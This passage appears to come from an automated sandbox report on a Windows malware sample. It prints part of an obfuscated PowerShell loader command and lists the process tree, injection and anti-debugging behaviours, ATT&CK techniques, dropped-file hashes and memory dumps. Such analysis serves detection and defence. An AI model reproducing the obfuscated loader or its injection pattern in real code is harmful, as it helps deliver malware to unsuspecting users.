Semi=Saba Fram[PaisSSk,tyIn osSu,et mpoeDuodm Ant. pomTRa ie Hebx Tilt er.C piE PlanBa nci loounpadS.geiS,xunxylogNull]J.nn:Beta:.lkeASt nSheteCpoliI amIRumo.Sp.nGDem e Bast PlaSUndmtD,sarVerdi BilnOp fgBark(A,om$PaisWMissoP euvDelrenysan Ti )Yett ');massively (Unencompassed170 ' erk$ThomgWivelbagmoTyrabMas aSjlelDecu: BliTCe av ChaaProln Deag LarsIndofrigsoKandr DidaGo dn ThysEvertStraa UnilChiltAfdenEcsti.lavnDiseg FersDoig=Cern$MellN StaoSpilnTusidOotseF,ilmCa,paBettnChird TeliH ndnS rigUdbi. lusP,atuO erbF its Spit kulrBesniForenLynggAf i( ag$ TabPPharhWanto indnschwoF.repLyseoOsterSurseMakr,Ud,y$ObsoU InsdCentv retiVicekTit lFr pi Ma nStikgY.misActlfRecuoTranrTrollBashb Ci e Su,n RubeTwib)Hver ');massively $Tvangsforanstaltnings;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2852
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unfasciated.Hol && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2536
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LY4BOFF4F6KXGMFG3D3E.temp

Filesize
7KB

MD5
b9d7e557afc283fb0b78fd05af36bd58

SHA1
e0d8d55141fc2ac83db09c4b60f21631efdd9619

SHA256
3b3c2b0a1c08e158cf9879938c6e390b66cb2d9f02a1d98c43666a7e0a512314

SHA512
674d1d815e3af98cc673e590996300d47f7db08fe2d3104509c057fabc976c19344c44e0f7c054479f815e7f2e5d57f00b3fa77e2dd113830d4109a966f00782

Download Submit
C:\Users\Admin\AppData\Roaming\Unfasciated.Hol

Filesize
470KB

MD5
98074e97335a66b5889ef02ae6a4cb15

SHA1
2bcb63391d386eea8c04aa7d2421d6931a1aeb4b

SHA256
6be3ea2cf58c974a4775ac67d8e2bc601c24ad7d5fb4a33fc0451fc7fffa64fb

SHA512
2526aa62c56ddb62b03e7c897d2ba9eb17b15d21dca1b4dacc8f025ecbbb3e59803975dd5c0f4c1a957d5a7ba8226945ffed7028bad0578405c7c55ecb4eb12c

Download Submit
memory/1328-13-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/1328-14-0x000007FEF53DE000-0x000007FEF53DF000-memory.dmp

Filesize
4KB

Download
memory/1328-8-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/1328-9-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/1328-10-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/1328-11-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/1328-4-0x000007FEF53DE000-0x000007FEF53DF000-memory.dmp

Filesize
4KB

Download
memory/1328-7-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/1328-6-0x0000000002270000-0x0000000002278000-memory.dmp

Filesize
32KB

Download
memory/1328-5-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/1328-43-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

Filesize
9.6MB

Download
memory/2732-20-0x0000000001C30000-0x0000000002B13000-memory.dmp

Filesize
14.9MB

Download
memory/2732-22-0x0000000000BC0000-0x0000000001C22000-memory.dmp

Filesize
16.4MB

Download
memory/2732-42-0x0000000000BC0000-0x0000000001C22000-memory.dmp

Filesize
16.4MB

Download
memory/2732-44-0x0000000000BC0000-0x0000000000C00000-memory.dmp

Filesize
256KB

Download
memory/2852-19-0x0000000006870000-0x0000000007753000-memory.dmp

Filesize
14.9MB

Download

Analysis

Sharing